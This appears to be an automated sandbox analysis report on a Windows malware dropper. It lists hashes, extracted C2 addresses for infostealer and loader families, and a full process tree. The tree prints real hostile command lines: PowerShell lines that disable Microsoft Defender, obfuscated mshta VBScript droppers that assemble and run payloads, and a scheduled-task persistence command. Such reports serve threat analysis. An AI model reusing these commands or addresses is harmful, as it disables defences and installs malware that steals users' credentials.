Analysis

  • max time kernel
    39s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-en-20211104
  • submitted
    19/11/2021, 18:12

General

  • Target

    ab0bd8932a92421272b5911e2ebf488b.exe

  • Size

    9.7MB

  • MD5

    ab0bd8932a92421272b5911e2ebf488b

  • SHA1

    8fc75411fae94208b303c30faf3f4ba7385f8e22

  • SHA256

    61299f208e35ed6fa26b16639ff495d378f64f9486a70c29eae80592d930e791

  • SHA512

    587d69b5016732170311cbfd85ca04c5b8127158e839e0155a6c225f3dd4e9a9f8a38b758316d557ceaf1b7c676c86f46250a5d3fd34c33681003cc41f1ddbc9

Malware Config

Extracted

Family

socelars

C2

http://www.gianninidesign.com/

Extracted

Family

smokeloader

Version

2020

C2

http://membro.at/upload/

http://jeevanpunetha.com/upload/

http://misipu.cn/upload/

http://zavodooo.ru/upload/

http://targiko.ru/upload/

http://vues3d.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

media151

C2

91.121.67.60:51630

Extracted

Family

vidar

Version

48.3

Botnet

933

Attributes
  • profile_id

    933

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 19 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe
    "C:\Users\Admin\AppData\Local\Temp\ab0bd8932a92421272b5911e2ebf488b.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:684
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:364
      • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:924
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
            PID:1292
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:852
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            4⤵
              PID:1256
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1724
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Mon135d1cd0566c227c.exe
              4⤵
              • Loads dropped DLL
              PID:1376
              • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon135d1cd0566c227c.exe
                Mon135d1cd0566c227c.exe
                5⤵
                • Executes dropped EXE
                PID:928
                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                  6⤵
                    PID:2096
                    • C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe
                      "C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"
                      7⤵
                        PID:1556
                        • C:\Users\Admin\AppData\Roaming\5592368.exe
                          "C:\Users\Admin\AppData\Roaming\5592368.exe"
                          8⤵
                            PID:1292
                          • C:\Users\Admin\AppData\Roaming\8164961.exe
                            "C:\Users\Admin\AppData\Roaming\8164961.exe"
                            8⤵
                              PID:3000
                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                9⤵
                                  PID:880
                              • C:\Users\Admin\AppData\Roaming\5579078.exe
                                "C:\Users\Admin\AppData\Roaming\5579078.exe"
                                8⤵
                                  PID:992
                                • C:\Users\Admin\AppData\Roaming\7804314.exe
                                  "C:\Users\Admin\AppData\Roaming\7804314.exe"
                                  8⤵
                                    PID:2920
                                    • C:\Users\Admin\AppData\Roaming\7935225.exe
                                      "C:\Users\Admin\AppData\Roaming\7935225.exe"
                                      9⤵
                                        PID:2236
                                        • C:\Windows\SysWOW64\mshta.exe
                                          "C:\Windows\System32\mshta.exe" vbscRIpT: cLosE ( CREaTeOBJeCT ( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Roaming\7935225.exe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF """" =="""" for %L In ( ""C:\Users\Admin\AppData\Roaming\7935225.exe"" ) do taskkill -IM ""%~NxL"" -F " , 0, trUE ) )
                                          10⤵
                                            PID:2908
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Roaming\7935225.exe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "" =="" for %L In ( "C:\Users\Admin\AppData\Roaming\7935225.exe" ) do taskkill -IM "%~NxL" -F
                                              11⤵
                                                PID:3068
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill -IM "7935225.exe" -F
                                                  12⤵
                                                  • Kills process with taskkill
                                                  PID:2640
                                                • C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe
                                                  ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM
                                                  12⤵
                                                    PID:1992
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" vbscRIpT: cLosE ( CREaTeOBJeCT ( "wsCrIpt.SheLl" ). run ( "cMD.exe /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ..\IGEVs2AgDHRD.EXe && StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF ""/PGeb9DQls~acXsvr9DzE3PVM "" =="""" for %L In ( ""C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe"" ) do taskkill -IM ""%~NxL"" -F " , 0, trUE ) )
                                                      13⤵
                                                        PID:2760
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ..\IGEVs2AgDHRD.EXe&& StArt ..\IGEvs2AgDHRD.EXE /PGeb9DQls~acXsvr9DzE3PVM & iF "/PGeb9DQls~acXsvr9DzE3PVM " =="" for %L In ( "C:\Users\Admin\AppData\Local\Temp\IGEVs2AgDHRD.EXe" ) do taskkill -IM "%~NxL" -F
                                                          14⤵
                                                            PID:2768
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          "C:\Windows\System32\mshta.exe" Vbscript: CloSe ( cREATEobjeCT( "WScRipT.SHelL" ). rUN ( "cMD.EXE /q /R eCHo | set /p = ""MZ"" > TiSQ.G & coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly & DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly ", 0 , tRuE ) )
                                                          13⤵
                                                            PID:2224
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              "C:\Windows\System32\cmd.exe" /q /R eCHo | set /p = "MZ" > TiSQ.G & coPy /Y /b TisQ.G + zO4NQ.~S+ hcd6.YS + L8KN6h.g ..\VYGDVP.ly & DEl /q *& stArT msiexec.exe -Y ..\VYGDVP.ly
                                                              14⤵
                                                                PID:2764
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /S /D /c" set /p = "MZ" 1>TiSQ.G"
                                                                  15⤵
                                                                    PID:3040
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /S /D /c" eCHo "
                                                                    15⤵
                                                                      PID:2676
                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                      msiexec.exe -Y ..\VYGDVP.ly
                                                                      15⤵
                                                                        PID:2508
                                                          • C:\Users\Admin\AppData\Roaming\1992774.exe
                                                            "C:\Users\Admin\AppData\Roaming\1992774.exe"
                                                            9⤵
                                                              PID:112
                                                          • C:\Users\Admin\AppData\Roaming\6803894.exe
                                                            "C:\Users\Admin\AppData\Roaming\6803894.exe"
                                                            8⤵
                                                              PID:1284
                                                          • C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"
                                                            7⤵
                                                              PID:1620
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 968
                                                                8⤵
                                                                • Program crash
                                                                PID:2468
                                                            • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                              7⤵
                                                                PID:560
                                                              • C:\Users\Admin\AppData\Local\Temp\chrome1.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
                                                                7⤵
                                                                  PID:2528
                                                                • C:\Users\Admin\AppData\Local\Temp\chrome update.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
                                                                  7⤵
                                                                    PID:2404
                                                                  • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                    7⤵
                                                                      PID:1284
                                                                    • C:\Users\Admin\AppData\Local\Temp\zhangliang-game.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\zhangliang-game.exe"
                                                                      7⤵
                                                                        PID:2416
                                                                      • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                        7⤵
                                                                          PID:2212
                                                                        • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                                                                          7⤵
                                                                            PID:2132
                                                                          • C:\Users\Admin\AppData\Local\Temp\chrome3.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
                                                                            7⤵
                                                                              PID:2868
                                                                            • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                              7⤵
                                                                                PID:1500
                                                                                • C:\Windows\System32\conhost.exe
                                                                                  "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                  8⤵
                                                                                    PID:2300
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                      9⤵
                                                                                        PID:1488
                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                          10⤵
                                                                                          • Creates scheduled task(s)
                                                                                          PID:2412
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                        9⤵
                                                                                          PID:1612
                                                                                          • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                            C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                            10⤵
                                                                                              PID:2804
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c Mon133b4073df5e3f72.exe
                                                                                  4⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:976
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe
                                                                                    Mon133b4073df5e3f72.exe
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    PID:1460
                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                      "C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT ( "WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF """" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe"") do taskkill /f -im ""%~nXZ"" " , 0 , TRUE ) )
                                                                                      6⤵
                                                                                        PID:2040
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF "" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon133b4073df5e3f72.exe") do taskkill /f -im "%~nXZ"
                                                                                          7⤵
                                                                                            PID:2208
                                                                                            • C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe
                                                                                              3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9
                                                                                              8⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2308
                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                "C:\Windows\System32\mshta.exe" VbScriPt: CLOSE ( cReatEObjECT ( "WscripT.SHell").run ( "C:\Windows\system32\cmd.exe /Q /C tyPe ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF ""/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9"" =="""" for %Z IN ( ""C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe"") do taskkill /f -im ""%~nXZ"" " , 0 , TRUE ) )
                                                                                                9⤵
                                                                                                  PID:2364
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /Q /C tyPe "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe" > 3SEL8GaJ5WrN1.EXe && StaRt 3SEL8GaJ5wRN1.EXe /PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9& iF "/PH_7h_09F5OVN3UJ0hRF1x0tV8JPL9" =="" for %Z IN ( "C:\Users\Admin\AppData\Local\Temp\3SEL8GaJ5WrN1.EXe") do taskkill /f -im "%~nXZ"
                                                                                                    10⤵
                                                                                                      PID:2504
                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                    "C:\Windows\System32\mshta.exe" vbscript:ClOse ( CReatEobJeCt ("wscrIPt.SHElL" ). RuN ( "C:\Windows\system32\cmd.exe /q/r EChO | sEt /P = ""MZ"" >XlaE8u7.Rq & cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ + M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F " ,0 ,TrUe ) )
                                                                                                    9⤵
                                                                                                      PID:2600
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\system32\cmd.exe" /q/r EChO | sEt /P = "MZ" >XlaE8u7.Rq & cOPy /B /y XLaE8u7.rQ + UnS0AW.LjZ + M_Ko01.HO + GNPM.EM + VLcSO2Y.Z+ fQRB.5 pcAKEo.F & STart control.exe .\PcAKEO.F
                                                                                                        10⤵
                                                                                                          PID:2660
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" EChO "
                                                                                                            11⤵
                                                                                                              PID:2696
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>XlaE8u7.Rq"
                                                                                                              11⤵
                                                                                                                PID:2708
                                                                                                              • C:\Windows\SysWOW64\control.exe
                                                                                                                control.exe .\PcAKEO.F
                                                                                                                11⤵
                                                                                                                  PID:2736
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\PcAKEO.F
                                                                                                                    12⤵
                                                                                                                      PID:2776
                                                                                                                      • C:\Windows\system32\RunDll32.exe
                                                                                                                        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\PcAKEO.F
                                                                                                                        13⤵
                                                                                                                          PID:3008
                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                            "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\PcAKEO.F
                                                                                                                            14⤵
                                                                                                                              PID:3020
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /f -im "Mon133b4073df5e3f72.exe"
                                                                                                                  8⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:2320
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c Mon13d453d994180b.exe
                                                                                                          4⤵
                                                                                                            PID:1864
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13d453d994180b.exe
                                                                                                              Mon13d453d994180b.exe
                                                                                                              5⤵
                                                                                                                PID:2820
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-BL57H.tmp\Mon13d453d994180b.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-BL57H.tmp\Mon13d453d994180b.tmp" /SL5="$301E0,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13d453d994180b.exe"
                                                                                                                  6⤵
                                                                                                                    PID:2912
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Mon1348816450.exe
                                                                                                                4⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:1740
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon1348816450.exe
                                                                                                                  Mon1348816450.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:1332
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Mon13459b4085.exe
                                                                                                                4⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:1752
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13459b4085.exe
                                                                                                                  Mon13459b4085.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:888
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Mon13136643d24e51.exe
                                                                                                                4⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:1012
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13136643d24e51.exe
                                                                                                                  Mon13136643d24e51.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:1504
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Mon13073304e5395.exe
                                                                                                                4⤵
                                                                                                                • Loads dropped DLL
                                                                                                                PID:1976
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe
                                                                                                                  Mon13073304e5395.exe
                                                                                                                  5⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:684
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-G9424.tmp\Mon13073304e5395.tmp" /SL5="$10186,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe"
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    PID:1912
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe" /SILENT
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:1576
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-4OFVO.tmp\Mon13073304e5395.tmp" /SL5="$20186,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13073304e5395.exe" /SILENT
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:240
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Mon13a2838ed1d8384.exe
                                                                                                                4⤵
                                                                                                                  PID:1312
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Mon134ab4d3e88a4d3e.exe
                                                                                                                  4⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:1720
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon134ab4d3e88a4d3e.exe
                                                                                                                    Mon134ab4d3e88a4d3e.exe
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                                                    PID:1448
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Mon13470f9aa951f871.exe /mixtwo
                                                                                                                  4⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:304
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe
                                                                                                                    Mon13470f9aa951f871.exe /mixtwo
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:752
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13470f9aa951f871.exe
                                                                                                                      Mon13470f9aa951f871.exe /mixtwo
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:2004
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 460
                                                                                                                        7⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        • Program crash
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:2116
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Mon13be6b39578.exe
                                                                                                                  4⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:912
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13be6b39578.exe
                                                                                                                    Mon13be6b39578.exe
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:752
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Mon13bb1ac8986b773.exe
                                                                                                                  4⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:1244
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe
                                                                                                                    Mon13bb1ac8986b773.exe
                                                                                                                    5⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:1264
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2168
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13bb1ac8986b773.exe
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2272
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c Mon13248c3d7ea8c81.exe
                                                                                                                  4⤵
                                                                                                                    PID:1064
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13248c3d7ea8c81.exe
                                                                                                                      Mon13248c3d7ea8c81.exe
                                                                                                                      5⤵
                                                                                                                        PID:2836
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13248c3d7ea8c81.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\7zSC61778E5\Mon13248c3d7ea8c81.exe" -u
                                                                                                                          6⤵
                                                                                                                            PID:2884
                                                                                                                • C:\Windows\system32\rundll32.exe
                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                  1⤵
                                                                                                                  • Process spawned unexpected child process
                                                                                                                  PID:2228
                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                    2⤵
                                                                                                                      PID:2216
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                    1⤵
                                                                                                                      PID:2344
                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                      1⤵
                                                                                                                        PID:956
                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                        1⤵
                                                                                                                        • Process spawned unexpected child process
                                                                                                                        PID:2564
                                                                                                                      • C:\Windows\system32\makecab.exe
                                                                                                                        "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20211119181100.log C:\Windows\Logs\CBS\CbsPersist_20211119181100.cab
                                                                                                                        1⤵
                                                                                                                          PID:2884

                                                                                                                        Network

                                                                                                                              MITRE ATT&CK Enterprise v6

                                                                                                                              Replay Monitor

                                                                                                                              Loading Replay Monitor...

                                                                                                                              Downloads

